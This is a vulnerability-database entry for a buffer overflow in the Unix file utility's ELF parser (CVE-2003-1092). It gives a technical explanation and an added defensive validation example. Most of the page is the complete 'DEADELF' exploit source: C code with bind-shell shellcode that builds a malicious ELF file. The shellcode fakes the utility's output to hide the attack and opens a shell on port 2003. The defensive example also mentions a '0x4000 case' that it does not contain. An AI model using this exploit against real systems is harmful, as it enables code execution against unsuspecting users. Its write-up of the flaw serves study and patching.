Local buffer overflow vulnerability in the file utility
Vulnerability ID: 1107234
Vulnerability type: Design error
Published: 2003-03-06
Updated: 2005-10-20
CVE: CVE-2003-1092
CNNVD-ID: CNNVD-200312-187
Platform: Linux
CVSS score: 7.5
|Vulnerability source
|Vulnerability details
file(1) is a utility for identifying file types. The file(1) command contains a buffer overflow vulnerability that a local attacker can exploit to execute arbitrary instructions on the system with the privileges of the user running it. The problem lies in the doshn() call inside the tryelf() function at line 587 of readelf.c:

doshn(class, swap, fd, getu32(swap, elfhdr.e_shoff), getu16(swap, elfhdr.e_shnum), getu16(swap, elfhdr.e_shentsize));

The last argument to doshn(), 'elfhdr.e_shentsize', is later used as the length of the read() call at line 133 of readelf.c:

if (read(fd, sh_addr, size) == -1)

This read() call copies 'size' bytes into the 'sh_addr' variable defined at line 92 of readelf.c:

#define sh_addr (class == ELFCLASS32 ? (void *)&sh32 : (void *)&sh64)

The buffer read() writes into is only 0x20 (32) bytes, so a 'size' value of 0x28 (40) bytes overwrites the saved EBP and EIP registers on the stack and allows arbitrary code to run with another user's privileges. A user can craft a malicious file and entice another user to analyze it with file(1), triggering the buffer overflow and executing arbitrary instructions with that user's privileges.
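The check the vulnerable doshn() lacks, as an added example that is not code from this page or from file(1) itself: e_shentsize is validated against the section header size of the declared ELF class (and in the declared byte order) before anything is read into a fixed-size buffer. The names check_shentsize(), build_header() and classify() and the constructed test headers are this example's own.

```c
/* Added example, not file(1)'s own code: validate e_shentsize against the
 * declared ELF class before any read() into a fixed-size buffer. The names
 * check_shentsize(), build_header() and classify() are chosen for this example. */
#include <elf.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
enum { SHDR_OK = 0, SHDR_TRUNCATED = -1, SHDR_NOTELF = -2, SHDR_BADSIZE = -3 };
/* Read a 16-bit header field in the byte order declared by e_ident[EI_DATA]. */
static unsigned get_u16(const unsigned char *p, int msb) {
    return msb ? (unsigned)((p[0] << 8) | p[1]) : (unsigned)(p[0] | (p[1] << 8));
}
/* e_shentsize must equal sizeof(Elf32_Shdr) (40) or sizeof(Elf64_Shdr) (64);
 * the vulnerable doshn() passed it to read() unchecked. */
int check_shentsize(const unsigned char *buf, size_t len) {
    size_t need, off, expect;
    if (len < EI_NIDENT) return SHDR_TRUNCATED;
    if (memcmp(buf, ELFMAG, SELFMAG) != 0) return SHDR_NOTELF;
    if (buf[EI_DATA] != ELFDATA2LSB && buf[EI_DATA] != ELFDATA2MSB) return SHDR_NOTELF;
    if (buf[EI_CLASS] == ELFCLASS32) {
        need = sizeof(Elf32_Ehdr); off = offsetof(Elf32_Ehdr, e_shentsize); expect = sizeof(Elf32_Shdr);
    } else if (buf[EI_CLASS] == ELFCLASS64) {
        need = sizeof(Elf64_Ehdr); off = offsetof(Elf64_Ehdr, e_shentsize); expect = sizeof(Elf64_Shdr);
    } else return SHDR_NOTELF;
    if (len < need) return SHDR_TRUNCATED;
    return get_u16(buf + off, buf[EI_DATA] == ELFDATA2MSB) == expect ? SHDR_OK : SHDR_BADSIZE;
}
/* Constructed test input: a zeroed ELF header with only e_ident and e_shentsize set. */
size_t build_header(unsigned char *out, int cls, int data, unsigned shentsize) {
    size_t need = cls == ELFCLASS64 ? sizeof(Elf64_Ehdr) : sizeof(Elf32_Ehdr);
    size_t off = cls == ELFCLASS64 ? offsetof(Elf64_Ehdr, e_shentsize) : offsetof(Elf32_Ehdr, e_shentsize);
    memset(out, 0, need);
    memcpy(out, ELFMAG, SELFMAG);
    out[EI_CLASS] = (unsigned char)cls;
    out[EI_DATA] = (unsigned char)data;
    out[off] = (unsigned char)(data == ELFDATA2MSB ? shentsize >> 8 : shentsize);
    out[off + 1] = (unsigned char)(data == ELFDATA2MSB ? shentsize : shentsize >> 8);
    return need;
}
int classify(int cls, int data, unsigned shentsize) {
    unsigned char hdr[sizeof(Elf64_Ehdr)];
    return check_shentsize(hdr, build_header(hdr, cls, data, shentsize));
}
int main(void) {
    /* the exploit on this page writes e_shentsize = 0xfff into an ELFCLASS32 header */
    printf("exploit-style header: %d\n", classify(ELFCLASS32, ELFDATA2LSB, 0xfff)); /* -3 */
    printf("well-formed header:   %d\n", classify(ELFCLASS32, ELFDATA2LSB, 40));    /* 0 */
    return 0;
}
```

The 0x4000 case in the checks below would pass if the byte order were ignored (its low-endian reading is 64), which is why the declared EI_DATA must be honoured before comparing.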
|Exploit
source: http://www.securityfocus.com/bid/7009/info
It has been reported that a memory allocation issue exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially execute code as the user of the file utility.
/*
 * __________________
 * Black Sand Project
 * __________________
 *
 * Created by CrZ [[email protected]] LimpidByte [lbyte.void.ru] /06.03.2003/
 *
 * Bug discovered by iDEFENCE: http://www.idefense.com/advisory/03.04.03.txt
 *
 * program name: DEADELF
 *
 * description: Exploit for file program <= 3.39
 *
 * info: program create file-exploit and when you
 *       make "file /path/to/this/file-exploit" shell
 *       will open on 2003 port.
 *
 * Usage: ./85deadelf <file-exploit> [return address]
 *
 * Example of work:
 *
 * [crz@blacksand crz]$ gcc -o 85deadelf 85deadelf.c
 * [crz@blacksand crz]$ ./85deadelf deadelf
 * [+] Creating a evil file deadelf!
 * [+] Using address of shellcode = 0xbfffbd40
 * [crz@blacksand crz]$ file deadelf
 * File: ASCII text
 * [crz@blacksand crz]$ telnet localhost 2003
 * Trying 127.0.0.1...
 * Connected to blacksand (127.0.0.1).
 * Escape character is '^]'.
 * id;
 * uid=500(crz) gid=500(crz) groups=500(crz)
 * : command not found
 * exit;
 * Connection closed by foreign host.
 * [crz@blacksand crz]$
 *
 * Tested against: file-3.37 (RedHat8.0)
 *                 file-3.38 (RedHat8.0)
 */
#include <elf.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

void usage(char *prog) {
    printf("\nCreated by CrZ [[email protected]] Limpid Byte [lbyte.void.ru]\n");
    printf("Usage: %s <name of evil file> [return address]\n\n", prog);
    exit(0);
}

int main(int argc, char **argv) {
    /*
     * a simple shellcode that show fake result of file program & bind
     * shell on 2003 port by CrZ
     */
    char shellcode[] =
        "\x31\xc0\x31\xdb\x53\xb3\x01\x50" /* write(1,"File: ASCII text"); */
        "\x68\x01\x01\x0a\x0d\x68\x74\x65"
        "\x78\x74\x68\x43\x49\x49\x20\x68"
        "\x3a\x20\x41\x53\x68\x46\x69\x6c"
        "\x65\x89\xe1\xb2\x18\xb0\x04\xcd\x80"
        /* bind shell on 2003 port */
        "\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
        "\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
        "\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
        "\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
        "\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
        "\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
        "\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
        "\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
    int fd, i;
    Elf32_Ehdr elfhdr;
    unsigned int xret = 0xbfffbd40;   /* 32-bit return address, written 4 bytes at a time below */
    char *evilfile = "bl00mps";

    if (!argv[1]) usage(argv[0]);
    else evilfile = argv[1];
    if (argv[2]) sscanf(argv[2], "0x%x", &xret);
    printf("[+] Creating a evil file %s!\n", evilfile);
    printf("[+] Using address of shellcode = 0x%x\n", xret);

    /* create or truncate the output file directly (the original shelled out to "echo>file" first) */
    fd = open(evilfile, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) { perror("open"); return 1; }

    bzero(&elfhdr, sizeof elfhdr);
    elfhdr.e_type = 1;                 // type should be NOT ET_CORE (4) & NOT ET_EXEC (2)
    memcpy(elfhdr.e_ident, "\x7f\x45\x4c\x46\x01\x01\x01", 7); // ELF32 FORMAT
    elfhdr.e_machine = 1;
    elfhdr.e_version = 1;
    elfhdr.e_entry = 0;
    elfhdr.e_phoff = 0;
    elfhdr.e_shoff = 0;
    elfhdr.e_flags = 0;
    elfhdr.e_ehsize = 0;
    elfhdr.e_phentsize = 0xfff;        // define size for read()
    elfhdr.e_phnum = 1;                // this is for stop for() loop when read()
    elfhdr.e_shentsize = 0xfff;        // define size for read()
    elfhdr.e_shnum = 1;                // this is for stop for() loop when read()
    elfhdr.e_shstrndx = 0;
    write(fd, &elfhdr, sizeof(elfhdr));
    for (i = 0; i < 20; i++) write(fd, &xret, 4);    // write new return address
    for (i = 0; i < 6000; i++) write(fd, "\x90", 1); // write nops
    write(fd, shellcode, sizeof shellcode);          // write shellcode
    close(fd);
    return 0;
}
|References
US-CERT Vulnerability Note VU#100937: http://www.kb.cert.org/vuls/id/100937
XF file-afctr-memory-allocation (11488): http://xforce.iss.net/xforce/xfdb/11488
BID 7009: http://www.securityfocus.com/bid/7009
OPENPKG OpenPKG-SA-2003.017: http://www.securityfocus.com/archive/1/313847
NSFOCUS 4500: http://www.nsfocus.net/vulndb/4500